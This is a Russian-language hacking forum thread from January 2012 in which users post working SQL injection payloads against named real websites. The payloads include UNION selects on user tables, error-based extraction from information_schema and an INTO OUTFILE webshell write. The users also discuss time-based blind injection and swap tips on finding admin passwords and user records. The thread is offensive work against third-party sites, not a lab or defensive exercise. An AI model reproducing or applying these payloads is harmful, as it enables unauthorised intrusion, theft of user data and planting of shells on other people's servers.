01.01.2012, 23:50
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Konqi
http://www.pitatel.ru/pclass.php?id=19+and+0+union+select+1,2,3,4,count( 0),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23+from+batterika_mysql.p_users--+
таблица пуста
ППц
если таблици test:jos_users и test:bak_users тоже пустые, ге тогда хранятся данные о юзерах???
|
|
|
01.01.2012, 23:56
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
С нами:
8960082
Репутация:
-14
|
|
Сообщение от qaz
ППц
если таблици test:jos_users и test:bak_users тоже пустые, ге тогда хранятся данные о юзерах???
Обязательно они там должны быть? может это админ такой хитрый.
P.S: а сам редактирует сайт через cpanel (я так думаю)
|
|
|
|
01.01.2012, 23:59
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от qaz
ППц
если таблици test:jos_users и test:bak_users тоже пустые, ге тогда хранятся данные о юзерах???
Возможно пароль админа хранится в config.php/admin.php/settings.php/etc. Как вариант, возможно, что скрипты для авторизации/регистрации подключены к другой БД. Вообщем сейчас посмотрю...
UPD. Смотрим админку
http://www.pitatel.ru/admin/
Код:
Access denied for user 'batterika'@'localhost' (using password: NO)
Нет коннекта. Смотрим текст:
Код:
C 14 июля 2011 года компания Pitatel вошла в группу компаний "Баттерика"!
Соответственно, сайт заброшен. БД с пассами админки не подключена...
|
|
|
|
02.01.2012, 00:00
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от qaz
ППц
если таблици test:jos_users и test:bak_users тоже пустые, ге тогда хранятся данные о юзерах???
table_rows в помощь
|
|
|
|
02.01.2012, 22:12
|
|
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
С нами:
7725206
Репутация:
26
|
|
http://er-region.ru/about/department/index.php?id=139+and+1=2+union+select+1,2,3,4,5--+
я так понял, тут нет прямого вывода?
|
|
|
|
02.01.2012, 22:29
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от smirk
http://er-region.ru/about/department/index.php?id=139+and+1=2+union+select+1,2,3,4,5--+
я так понял, тут нет прямого вывода?
Код:
http://er-region.ru/about/department/index.php?id=13999999999999.9+and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
Все выводится через error-based. Смотрим исходник:
Код:
[Duplicate entry 'COLLATIONS1' for key 'group_key']
---
|
|
|
|
03.01.2012, 11:01
|
|
Познающий
Регистрация: 01.08.2006
Сообщений: 35
С нами:
10409033
Репутация:
3
|
|
иньекция в запросе вида
SELECT * FROM `users` WHERE `news_id` = 123 ORDER BY `news_date` [INJECTION]
есть у кого идеи как ее можно раскрутить?
метод что описан в https://forum.antichat.net/thread43966.html не подходит т.к. там иньекция в ORDER BY [INJECTION], в моем случае параметр уже задан...
|
|
|
|
03.01.2012, 11:15
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от [R
eD"]
[R]eD said:
иньекция в запросе вида
SELECT * FROM `users` WHERE `news_id` = 123 ORDER BY `news_date` [INJECTION]
есть у кого идеи как ее можно раскрутить?
метод что описан в https://forum.antichat.net/thread43966.html не подходит т.к. там иньекция в ORDER BY [INJECTION], в моем случае параметр уже задан...
Error-based, не?
|
|
|
|
03.01.2012, 11:26
|
|
Познающий
Регистрация: 01.08.2006
Сообщений: 35
С нами:
10409033
Репутация:
3
|
|
Сообщение от Ereee
Error-based, не?
вывод ошибок да, там есть, но иньекция ведь в последних параметрах как там такое провести?
|
|
|
|
03.01.2012, 13:48
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
Сообщение от [R
eD"]
[R]eD said:
вывод ошибок да, там есть, но иньекция ведь в последних параметрах как там такое провести?
UNION не работает кстати после ORDER BY.
Единственное, что я вижу, что можно попробовать, это
Код:
INTO OUTFILE '/full/path/to/shell.php' LINES TERMINATED BY +''
Но опять же, FILE_PRIV = Y, magic_quotes_gpc = Off
Можно подобрать еще количество колонок, но т.к. UNION работать не будет, то толку мало.
Крутить как-то так:
UPD
Код:
SELECT user FROM mysql.user ORDER BY user, sleep(IF(substr(@@version, 1, 1)=4, 1, 0));
SELECT user FROM mysql.user ORDER BY user, sleep(IF(substr(@@version, 1, 1)=5, 1, 0));
Ток если записей много, то лучше юзать LIMIT.
Что-то по типу blind sleep-based sql injection
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [R]eD](/avatars/avatar26157.jpg?2962667){kind=avatar}
![Аватар для [R]eD](/avatars/avatar26157.jpg?2962681){kind=avatar}
Похожие темы
Комбинированный вид
